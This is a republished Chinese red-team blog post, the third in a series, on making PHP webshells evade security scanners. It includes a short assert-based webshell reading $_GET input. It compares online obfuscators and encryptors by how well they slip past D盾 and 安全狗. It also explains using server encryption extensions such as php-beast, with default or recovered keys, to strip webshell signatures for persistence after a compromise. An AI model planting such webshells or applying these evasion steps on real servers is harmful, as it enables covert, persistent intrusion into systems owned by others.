什么?你还不会webshell免杀?(三)

admin 2022年7月7日17:15:53安全闲碎评论9 views1989字阅读6分37秒阅读模式

无扩展免杀

1.php加密

这里是利用phpjiami网站进行加密,进而达到加密效果

https://www.phpjiami.com/

什么?你还不会webshell免杀?(三)

加密前:

<?php
session_start();
$a = "a";
$s = "s";
$c=$a.$s."sert";
$c($_GET["1"]);
?>

查杀效果

什么?你还不会webshell免杀?(三)


什么?你还不会webshell免杀?(三)

可以看到这里D某和某狗都查杀

里用php加密后效果

什么?你还不会webshell免杀?(三)

查杀效果

什么?你还不会webshell免杀?(三)


什么?你还不会webshell免杀?(三)

可以看到这里只有D某会显示加密脚本,而某狗直接绕过

2.dezend加密

http://dezend.qiling.org/encrypt.html

什么?你还不会webshell免杀?(三)


什么?你还不会webshell免杀?(三)

免杀效果

什么?你还不会webshell免杀?(三)

可以看到dezend加密的特征还是太过明显

3.z5encrypt

https://z5encrypt.com/encrypt/build

什么?你还不会webshell免杀?(三)

4.php-obfuscator

工具下载

https://github.com/naneau/php-obfuscator

在线工具

https://www.phpobfuscator.cn/

什么?你还不会webshell免杀?(三)

什么?你还不会webshell免杀?(三)

不太行

5.yakpro-po

工具下载

https://github.com/pk-fr/yakpro-po

在线工具

https://www.php-obfuscator.com/?demo

什么?你还不会webshell免杀?(三)

免杀效果

什么?你还不会webshell免杀?(三)

img

并不太行

6.phpjm

http://www.phpjm.net/encode.html

加密后效果

什么?你还不会webshell免杀?(三)

免杀效果什么?你还不会webshell免杀?(三)


什么?你还不会webshell免杀?(三)

7.Virbox

工具下载

https://shell.virbox.com/apply.html

加密后效果

什么?你还不会webshell免杀?(三)

Virbox已经属于是商业源码加密,基本上没有任何特征

但是由于这个是需要将生成好的php-cqi.exe原有的php-cqi.exe才能达到解密的效果,因此只能说作为一个权限维持的方式,先拿到权限后,修改php-cqi.exe,在上这种加密马,作为一个权限维持

加密过程:

https://baijiahao.baidu.com/s?id=1671004157804653895&wfr=spider&for=pc

免杀效果

什么?你还不会webshell免杀?(三)


什么?你还不会webshell免杀?(三)

7.总结

以上总结了webshell加密的工具,其实在非扩展的加密工具中,其原理很多就是混淆变量名和函数名,类名,命名空间等等,可以配合多个加密工具进行多种加密,当然也可以和之前文章的免杀进行结合

扩展免杀

由于很多企业为了防止源码泄露,都会使用加密扩展将代码进行加密,那么我们就可以就将计就计,将webshell也利用扩展加密,将特征消除,从而达到免杀的效果

1.php-beast

扩展地址

https://github.com/liexusong/php-beast
https://github.com/imaben/php-beast-binaries

下载dll,并添加至ext中

什么?你还不会webshell免杀?(三)

在php.ini 中添加该扩展

什么?你还不会webshell免杀?(三)

修改configure.ini

source path
src_path = "C:/Users/12107/Desktop/demo/"

; destination path
dst_path = "C:/Users/12107/Desktop/demo2/"

; expire time
expire = "2021-09-08 17:01:20"

; encrypt type
encrypt_type = "AES"

什么?你还不会webshell免杀?(三)


什么?你还不会webshell免杀?(三)


什么?你还不会webshell免杀?(三)

当然也可以不使用默认密钥

在aes_algo_handler.c中可以修改默认密钥

什么?你还不会webshell免杀?(三)

当然如果没有密钥其实是无法生成一个能被解析的php文件,因此还需要通过逆向获取dll中的密钥

破解参考:

http://www.phpheidong.com/blog/article/337644/71c2cabcc769f99d7808/

2.screw_plus

环境搭建

https://blog.oioweb.cn/64.html
https://newsn.net/say/php-screw-plus.html

破解参考:

https://www.cnblogs.com/StudyCat/p/11268399.html

3.总结

基于扩展的免杀,如果知道密钥,经加密后的webshell是不具备任何特征的,基本上直接通杀。

具体步骤通过phpinfo获取扩展信息,根据不同的加密扩展进行尝试利用默认密钥进行加密,通过访问webshell来判断密钥是否正确,当然,这种方法其实只能用于权限维持需要拿到权限后获取扩展文件破解后,才能稳定获取密钥,进而加密webshell


wx

什么?你还不会webshell免杀?(三)

windows

shellcode

webshell

webshell

ntds.dit

mimikatz

shellcode


什么?你还不会webshell免杀?(三)

原文始发于微信公众号(红队蓝军):什么?你还不会webshell免杀?(三)

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月7日17:15:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  什么?你还不会webshell免杀?(三) http://cn-sec.com/archives/1163412.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: